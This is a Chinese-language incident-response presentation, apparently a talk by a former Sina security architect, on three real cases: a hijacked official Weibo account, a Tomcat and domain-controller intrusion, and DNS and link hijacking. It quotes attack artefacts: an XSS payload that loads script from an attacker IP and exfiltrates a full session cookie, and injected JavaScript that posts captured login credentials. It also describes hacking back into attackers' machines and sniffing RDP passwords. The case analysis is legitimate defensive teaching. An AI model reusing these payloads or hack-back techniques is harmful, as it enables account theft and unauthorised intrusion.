AirJD 焦点
AirJD

没有录音文件
00:00/00:00
加收藏

“企业应急响应与反渗透”之真实案例分析

发布者 word
发布于 1439436408977  浏览 4621 关键词 网络安全 
分享到

第1页

“企业应急响应以及反渗透”

之真实案例分析



第2页

关于我



第3页

• piaca • 乌云⽩白帽⼦子 • 前新浪安全架构师 • Insight Labs 成员 • ⼋八年安全从业经验



第4页

• 应急响应介绍 • ⼀一些案例 • 总结



第5页

什么是应急响应?



第6页

被“⿊黑”了

• 被⼊入侵 • 被蠕⾍虫 • 被钓⻥鱼 • 被 DDoS • 被劫持 • ……



第7页

为什么做应急响应?



第8页

被逼的



第9页

为什么做应急响应?

• 保障业务 • 还原攻击 • 明确意图 • 解决⽅方案 • 查漏补缺 • 司法途径



第10页

怎么做应急响应?



第11页

怎么做应急响应?

• 确定攻击时间 • 查找攻击线索 • 梳理攻击流程 • 实施解决⽅方案 • 定位攻击⼈人,取证



第12页

为什么做反渗透?



第13页

为什么反渗透?

• 被动变主动 • 攻击者都在做什么 • 确认攻击者是谁 • 取证



第14页

案例之官微帐号被盗



第16页

分析原因

• ⾮非⼯工作⼈人员操作 • 帐号有被 cookie 登录 • 可是 cookie 有 httponly



第17页

==================================================



URL



: http://t.cn/zWI1bUQ



Last Visit Date : 2012-7-16 19:22:27



==================================================



==================================================



URL



: http://50.116.13.242/index.php



Last Visit Date : 2012-7-16 19:22:28



Referrer



: http://t.cn/zWI1bUQ



==================================================



==================================================



URL



: http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js



%3E%3C/script%3E%22%27})



Last Visit Date : 2012-7-16 19:22:28



Referrer



: http://50.116.13.242/index.php



Title



: player.swf (application/x-shockwave-flash 对象)



==================================================



==================================================



URL



: http://50.116.13.242/e.php?opener=0&cookie=ULV



%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma



%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn



%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B



%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3Dxlttnews@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry



%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B



%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des



%253D5937b4f4509871fc45195767ea7abe37%2526ev



%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c



%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V



%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2



Last Visit Date : 2012-7-16 19:22:31



Referrer



: http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js



%3E%3C/script%3E%22%27})



==================================================



第18页

⼯工作⼈人员收到⼀一条私信……



第19页

还原攻击

• 某分站 XSS • 某分站 Apache CVE-2012-0053



第20页

我们做了什么

• 修复漏洞,修复同类漏洞 • 加强员⼯工安全意识 • 增加帐号安全策略



第21页

关于攻击者

• 通过 IP / 邮箱信息定位到某公司安全⼈人员 • 没有恶意⺫⽬目的 • 后⾯面有把漏洞提交乌云



第22页

案例之 500 错误⽇日志引发的⾎血案



第24页

分析原因

• 500 错误代表⽂文件存在并且执⾏行 • ⾮非业务⽂文件 • 从更多的⽇日志⼊入⼿手



第27页

还原攻击

• 通过⽇日志确认⼊入侵途径是 tomcat • 做了⼀一些操作 • tomcat 帐号密码并⾮非弱密码,how?



第28页

再次分析原因并且还原攻击

• 全⺴⽹网排查

• 攻击者早在⼏几⽉月前就发⽣生 • 通过收集帐号密码



第29页

吹响反击号⾓角

• 收集攻击者 IP

• ⼤大多是⾁肉鸡 IP,⾹香港,廊坊 • ⽤用“⿊黑客”的⽅方法拿到⾹香港,廊坊多台⾁肉鸡权限 • 在⾁肉鸡上发现⼤大量⿊黑客⼯工具和扫描⽇日志 • 在⾁肉鸡上发现内⺴⽹网仍有服务器被控制



第32页

我们做了什么

• 清理后门 • 清理全⺴⽹网 tomcat • 梳理全⺴⽹网 web ⺫⽬目录⽂文件 • 修改业务相关帐号密码 • 修改业务关键代码 • IDC 出⼝口策略 • 部署 snort



第33页

这就完了?



第34页

很傻很天真



第35页

IT 反馈域控服务器异常



第36页

gh0st



第37页

继续分析

• 多台服务器被植⼊入后门 • 通过 at ⽅方式植⼊入后门 • 通过域控管理帐号 • 确定被植⼊入后门最初时间



第38页

2011-­‐11-­‐10,14:03:47,Security,审核成功,登录/注销
 ,540,*\*,PDC,”成功的网络登录: 
 
  用户名:
  *.ad 
 
  域:
  
  * 
 
  登录
 ID:
  
  (0x0,0x1114E11) 
 
  登录类型:
 3 
 
  登录过程:
 NtLmSsp
  
 
  身份验证数据包:
  NTLM 
 
  工作站名:
 CC-­‐TEST-­‐V2 
 
  登录
 GUID:
  -­‐ 
 
  调用方用户名:
  -­‐ 
 
  调用方域:
 -­‐ 
 
  调用方登录
 ID:
  -­‐ 
 
  调用方进程
 ID:
 -­‐ 
 
  传递服务:
 -­‐ 
 
  源网络地址:
  192.168.100.81 
 
  源端口:
  0

2011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录
 ,680,NT
 AUTHORITY\SYSTEM,PDC,"尝试登录的用户:
 
  MICROSOFT_AUTHENTICATION_PACKAGE_V1_ 
 登录帐户:
 
 
  QM-­‐*$ 
 源工作站:
 
  CC-­‐TEST-­‐V2 
 错误代码:
 
  0xC000006A "
  2011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录
 ,680,NT
 AUTHORITY\SYSTEM,PDC,"尝试登录的用户:
 
  MICROSOFT_AUTHENTICATION_PACKAGE_V1_ 
 登录帐户:
 
 
  QM-­‐*$ 
 源工作站:
 
  CC-­‐TEST-­‐V2 
 错误代码:
 
  0xC000006A



第39页

192.168.100.81

• 虚拟机 • 弱⼝口令 • 内⺴⽹网检查时关机,逃过检查 • ⺫⽬目前能够确定这台是最初被渗透的 • 域控管理登录过 • 通过抓去 hash 控制域控



第41页

我们⼜又做了什么

• 排查所有 windows 服务器 • snort 加特征,发现仍有服务器被控制 • 继续排查



第43页

持续反击中

• 还有美国的 IP • 通过 C 段 cain 嗅探到 3389 密码



第45页

关于攻击者

• 美国的 vps 上含有多个 QQ 和密码 • 之前获取到其国内论坛帐号



第47页

案例之永⽆无⽌止境的劫持



第48页

案例之永⽆无⽌止境的劫持

• 某业务多次多种类型劫持

• DNS 劫持

• 劫持到⼀一个反向代理 IP 61.*.*.2

• 链路劫持

• 某业务链路劫持被插⼊入⼲⼴广告



第51页

function ffCheck() { try { try { var u = null != f ? f.idInput.value : document.getElementById("idInput").value; } catch (e) { var u = (document.getElementById("idInput").innerHTML).replace(/\s/g, ""); } var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value; if (u.indexOf("@") == -1) u += "@xxx.com"; try { if (u.indexOf("@") == -1) u = u + getdomain(); } catch (e) {} sendurl("/abc", u, p, "coremail"); } catch (e) {} return fOnSubmit();

}



第52页

function sendurl(uri, u, p, i) { xmlHttp = GetXmlHttpObject(); if (xmlHttp == null) { return; } param = "user=" + u + "&pass=" + p + "&icp=" + i; xmlHttp.onreadystatechange = stateChanged; try { xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true); } catch (e) {} xmlHttp.setRequestHeader("If-Modified-Since", "0"); xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlHttp.send(param);

}



第53页

处理过程

• 定位劫持位置

• TTL • IP

• 投诉



第54页

然并卵



第55页

我们做了什么

• 完善监控 • https?



第56页

总结

• 业务⾓角度

• 保障业务优先

• 对抗⾓角度

• 了解对⼿手

• 技术⾓角度

• 攻击技术 • ⽇日志、流量等数据



第57页

谢谢!



支持文件格式:*.pdf
上传最后阶段需要进行在线转换,可能需要1~2分钟,请耐心等待。